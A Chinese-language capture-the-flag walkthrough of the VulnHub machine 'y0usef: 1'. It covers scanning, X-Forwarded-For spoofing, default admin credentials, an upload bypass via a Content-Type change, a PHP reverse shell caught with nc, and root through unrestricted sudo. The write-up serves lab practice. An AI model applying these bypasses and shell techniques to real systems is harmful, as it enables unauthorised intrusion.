Y0usef
作者: jason_huawen
靶机基本信息
名称:y0usef: 1
地址:
https://www.vulnhub.com/entry/y0usef-1,624/
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.62.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:66:82:69 1 60 PCS Systemtechnik GmbH
192.168.56.247 08:00:27:ca:39:d0 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.247
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.247 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-06 21:36 EST
Nmap scan report for localhost (192.168.56.247)
Host is up (0.00018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d8:e0:99:8c:76:f1:86:a3:ce:09:c8:19:a4:1d:c7:e1 (DSA)
| 2048 82:b0:20:bc:04:ea:3f:c2:cf:73:c3:d4:fa:b5:4b:47 (RSA)
| 256 03:4d:b0:70:4d:cf:5a:4a:87:c3:a5:ee:84:cc:aa:cc (ECDSA)
|_ 256 64:cd:d0:af:6e:0d:20:13:01:96:3b:8d:16:3a:d6:1b (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Ubuntu)
MAC Address: 08:00:27:CA:39:D0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.35 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ curl http://192.168.56.247
<html>
<head>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" integrity="sha384-TX8t27EcRE3e/ihU7zmQxVncDAy5uIKz4rEkgIXeMed4M0jlfIDPvg6uqKI2xXr2" crossorigin="anonymous">
<body>
<div class="container-fluid">
<center class="mt-5">
<h1>Sorry , the site is under construction soon, it run </h1>
</center>
</div>
</body>
<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js" integrity="sha384-DfXdz2htPH0lsSSs5nCTpuj/zy4C+OGpamoFVy38MVBnE+IbbVYUew+OrCXaRkfj" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-ho+j7jyWK8fNQe+A12Hb8AhRq26LrZ/JpcUGGOn+Y7RsweNrtN/tE3MoK7ZeZDyx" crossorigin="anonymous"></script>
</head>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ curl http://192.168.56.247/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.10 (Ubuntu) Server at 192.168.56.247 Port 80</address>
</body></html>
利用浏览器访问80端口,返回apache2默认页面,不存在robots.txt文件,接下来做一下目录扫描:
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ nikto -h http://192.168.56.247
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.247
+ Target Hostname: 192.168.56.247
+ Target Port: 80
+ Start Time: 2022-12-06 21:40:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.29
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2022-12-06 21:41:29 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/06 21:39:13 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 302]
Progress: 218995 / 220561 (99.29%)===============================================================
2022/12/06 21:39:36 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,sh,txt
[+] Timeout: 10s
===============================================================
2022/12/06 21:39:47 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 293]
/index.php (Status: 200) [Size: 791]
/.html (Status: 403) [Size: 294]
/.html (Status: 403) [Size: 294]
/.php (Status: 403) [Size: 293]
/server-status (Status: 403) [Size: 302]
Progress: 1102787 / 1102805 (100.00%)===============================================================
2022/12/06 21:41:55 Finished
===============================================================
到目前为止没有扫描出任何目录或者文件,可能是由于常规的扫描把一些状态码过滤掉了,而这些目录可能往往意味着需要认证,因此需要对gobuster工具指定返回状态码,以获得更多的信息:
200 (成功) 服务器已成功处理了请求。通常,这表示服务器提供了请求的网页。
204 (无内容) 服务器成功处理了请求,但没有返回任何内容。
301 (永久移动) 请求的网页已永久移动到新位置。服务器返回此响应(对 GET 或 HEAD 请求的响应)时,会自动将请求者转到新位置。
302 (临时移动) 服务器目前从不同位置的网页响应请求,但请求者应继续使用原有位置来进行以后的请求。
307 (临时重定向) 服务器目前从不同位置的网页响应请求,但请求者应继续使用原有位置来进行以后的请求。
401 (未授权)请求要求身份验证。对于需要登录的网页,服务器可能返回此响应。
──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,401
Error: error on parsing arguments: status-codes ("200,204,301,302,307,401") and status-codes-blacklist ("404") are both set - please set only one. status-codes-blacklist is set by default so you might want to disable it by supplying an empty string.
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,401 --status-codes-blacklist ''
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 302,307,401,200,204,301
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/06 21:50:43 Starting gobuster in directory enumeration mode
===============================================================
Progress: 219246 / 220561 (99.40%)===============================================================
2022/12/06 21:51:09 Finished
===============================================================
还是没有扫描出任何目录,需要更换字典:
──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -s 200,204,301,302,307,401 --status-codes-blacklist ''
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Status codes: 200,204,301,302,307,401
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/06 21:52:00 Starting gobuster in directory enumeration mode
===============================================================
/. (Status: 200) [Size: 791]
/adminstration (Status: 301) [Size: 324] [--> http://192.168.56.247/adminstration/]
Progress: 118867 / 119601 (99.39%)===============================================================
2022/12/06 21:52:14 Finished
===============================================================
这次成功扫描出/administration目录,访问该目录,但是forbidden,这也证实了之前的猜测,继续扫描下级目录:
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247/adminstration/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -s 200,204,301,302,307,401 --status-codes-blacklist ''
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247/adminstration/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Status codes: 204,301,302,307,401,200
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/06 21:56:02 Starting gobuster in directory enumeration mode
===============================================================
/include (Status: 301) [Size: 332] [--> http://192.168.56.247/adminstration/include/]
/logout (Status: 301) [Size: 331] [--> http://192.168.56.247/adminstration/logout/]
/upload (Status: 301) [Size: 331] [--> http://192.168.56.247/adminstration/upload/]
/users (Status: 301) [Size: 330] [--> http://192.168.56.247/adminstration/users/]
/bootstrap (Status: 301) [Size: 334] [--> http://192.168.56.247/adminstration/bootstrap/]
但是访问这些目录,此时没有报错或者禁止访问,但是没有内容,尝试添加指向本地的X-Forwarded-For header头进行bypass,用burpsuite拦截请求,添加X-Forwarded-For: localhost
此时访问/adminstration,可使用firefox浏览器的插件X-Forwarded-For Header
对网页访问的过程添加有效的X-Forwarded-For header头,返回登录页面。
测试一下弱口令,发现是admin admin
接下来想办法将shell.php上传,但是返回file not allowed,需要bypass
发现用burpsuite拦截请求,修改content-type为image/jpg( image/jpeg都不行)
提示上传成功:file uploadad files/1670382468shell.php
访问该文件,获得shell:
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.247] 55915
Linux yousef-VirtualBox 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:08:14 UTC 2014 i686 i686 i686 GNU/Linux
06:11:11 up 37 min, 0 users, load average: 0.00, 0.13, 0.49
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@yousef-VirtualBox:/$ ls
ls
bin cdrom etc initrd.img lost+found mnt proc run srv tmp var
boot dev home lib media opt root sbin sys usr vmlinuz
www-data@yousef-VirtualBox:/$ cd home
cd home
www-data@yousef-VirtualBox:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 3 root root 4.0K Dec 6 2020 .
drwxr-xr-x 22 root root 4.0K Nov 25 2020 ..
-rw-r--r-- 1 root root 53 Dec 8 2020 user.txt
drwxr-xr-x 18 yousef yousef 4.0K Dec 8 2020 yousef
www-data@yousef-VirtualBox:/home$ cat user.txt
cat user.txt
c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=
www-data@yousef-VirtualBox:/home$
提权
在/home/yousef家目录中的user.txt,经过了bas64编码,将其解码:
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ echo 'c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=' | base64 -d
ssh :
user : yousef
pass : yousef123
得到了用户yousef的密码, ssh登录该用户
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ ssh [email protected]
The authenticity of host '192.168.56.247 (192.168.56.247)' can't be established.
ED25519 key fingerprint is SHA256:J3OrMiuy5X+zdlTAYCltBBCNaN3bxTjPbQvtPR6QSzE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.247' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic i686)
* Documentation: https://help.ubuntu.com/
778 packages can be updated.
482 updates are security updates.
Last login: Tue Dec 8 01:58:33 2020 from s
yousef@yousef-VirtualBox:~$ id
uid=1000(yousef) gid=1000(yousef) groups=1000(yousef),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
yousef@yousef-VirtualBox:~$ sudo -l
[sudo] password for yousef:
Matching Defaults entries for yousef on yousef-VirtualBox:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User yousef may run the following commands on yousef-VirtualBox:
(ALL : ALL) ALL
yousef@yousef-VirtualBox:~$ sudo /bin/bash
root@yousef-VirtualBox:~# cd /root
root@yousef-VirtualBox:/root# ls -alh
total 24K
drwx------ 2 root root 4.0K Dec 8 2020 .
drwxr-xr-x 22 root root 4.0K Nov 25 2020 ..
-rw------- 1 root root 235 Dec 8 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Feb 20 2014 .bashrc
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rw-r--r-- 1 root root 105 Dec 8 2020 root.txt
root@yousef-VirtualBox:/root# cat root.txt
WW91J3ZlIGdvdCB0aGUgcm9vdCBDb25ncmF0dWxhdGlvbnMgYW55IGZlZWRiYWNrIGNvbnRlbnQgbWUgdHdpdHRlciBAeTB1c2VmXzEx
root@yousef-VirtualBox:/root#
得到了root shell,以及root flag.
经验教训
-
第一直接是正确的,因此NMAP扫描出来的结果只有22和80端口,那么突破口只能是在80端口。
-
常规的目录扫描如果没有结果,需要考虑是不是因为状态码被过滤掉了,因为某些目录如需要认证才能访问,因此需要添加相应的参数,这样才可能扫描出相应的结果,同时需要考虑更换字典。
-
X-Forwarded-For插件可以用于修改浏览器的该字段(增加或者修改)
-
在做文件上传绕过时,注意观察正常可以上传文件时的各种表现,比如这次修改content-type,需要修改为image/jpg, 而image/jpeg不能正常上传